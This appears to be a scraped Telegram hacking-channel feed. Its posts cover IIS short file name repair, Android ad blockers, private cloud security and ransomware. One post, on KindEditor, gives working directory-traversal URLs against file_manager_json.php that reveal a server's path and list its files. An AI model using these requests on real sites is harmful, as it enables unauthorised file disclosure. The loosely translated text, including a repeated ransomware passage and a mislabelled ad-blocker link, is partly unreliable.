UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Telegram down xd
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘IIS short file/folder vulnerability repair method :

Turn off NTFS 8.3 file format support. This feature is turned on by default, and it is not necessary for most users.

If you are a virtual host space user, please contact the space provider for repair. Vulnerability description: IIS short file name disclosure vulnerability, file enumeration vulnerability exists in the implementation of IIS, attackers can use this vulnerability to enumerate and obtain files in the root directory of the server.

1) Modify the registry key: (restart the server to take effect)

HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation

The value is 1.

2) Execute the DOS command, fsutil behavior set disable8dot3 1

3) If your web environment does not require asp.net support, you can enter the Internet Information Service (IIS) Manager --- Web Service Extension-ASP.NET to choose to disable this function.

4) Upgrade net framework to version 4.0 or higher.

5) Delete the existing IIS directory and redeploy, and complete this step to completely repair it. (For example, it turned out to be wwwjb51 to create a new directory wwwjb512 and then change it back to wwwjb51.)

Copy the contents of the web folder to another location, such as D:\www to D:\www.back, then delete the original folder D:\www, and then rename D:\www.back to D:\www. If you do not copy again, the existing short file name will not disappear.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST ANDROID WORKING ADD BLOCKERS :

https://f-droid.org/en/packages/org.adaway/

https://adblockplus.org/

https://adguard.com/en/adguard-android/overview.html

https://play.google.com/store/apps/details?id=com.android.chrome

https://block-this.com/

by android authority
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Kindeditor traverse directory 0DAY problem :

KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.

πŸ¦‘Use method:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2)http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Explanation on the security of private cloud (cloud computing):

1) First of all, the technical foundation of cloud computing is based on an application management program. The hypervisor can isolate computing (and related security threats) from traditional security tools, and check for inappropriate or malicious data packets in network communications.

2) Since the virtual machines in the same server can communicate completely through the communication in the hypervisor, data packets can be sent from one virtual machine to another virtual machine without passing through a physical network. Generally installed security devices check the communication traffic on the physical network.

3) Crucially, this means that if a virtual machine is compromised, it can send dangerous communications to another virtual machine without even being aware of the organization's protective measures. In other words, an insecure application can cause attacks on other virtual machines, and the security measures adopted by the user are powerless.
From this, it is concluded that private clouds are also insecure.

4) I have no opinion on the above-mentioned overall theory, but is it a bit too arbitrary about the result? The above security issues do exist, but we have to see that it is not brought about by private clouds, but by virtualization. As the biggest difference between cloud computing and traditional computing, the problem of virtualization is real and will continue for some time to come.

5) The view of "public cloud is not secure, private cloud is secure" is of course incorrect. We can modify it, "Private cloud is safer than public cloud". On the one hand, the private cloud is deployed within the boundaries of the enterprise’s own data center. Compared with the public cloud, it has a greater guarantee for data security, and it will not cause any damage to the provider due to security issues. It is equivalent to storing our data in our own safe.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Cheap malicious programs kidnap your computer and force you to pay ransom :

The trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything unless you hand it in. ransom

1) With
the development of the times, the trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through flood-like advertisements, but to lock your computer and prevent you from doing anything.

2) Things, unless you pay a "ransom." The recent popular "ransomware" was first discovered on the abuse.ch website, using the malicious development tool "Blackhole". Moreover, this cheap malicious program can be collected through underground forums and infected systems, and it can easily and conveniently invade the Internet in the form of Adobe Flash Player, Adobe Reader or Java web plug-ins.

3) Once infected, the target system will be locked, and users need to log in to their fake website to pay a "ransom" before they can use your computer normally. It is reported that the "ransomware" has the most severe infections in Australia, France, Germany, the Netherlands, Switzerland and the United Kingdom. For example, in the United Kingdom, users will have to pay Β£50 ($80) after being infected with this malware. However, after unlocking, even though the user has achieved control over the computer, the Aldi Bot variant malware will still be installed, which may become a broiler of DDoS attacks

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁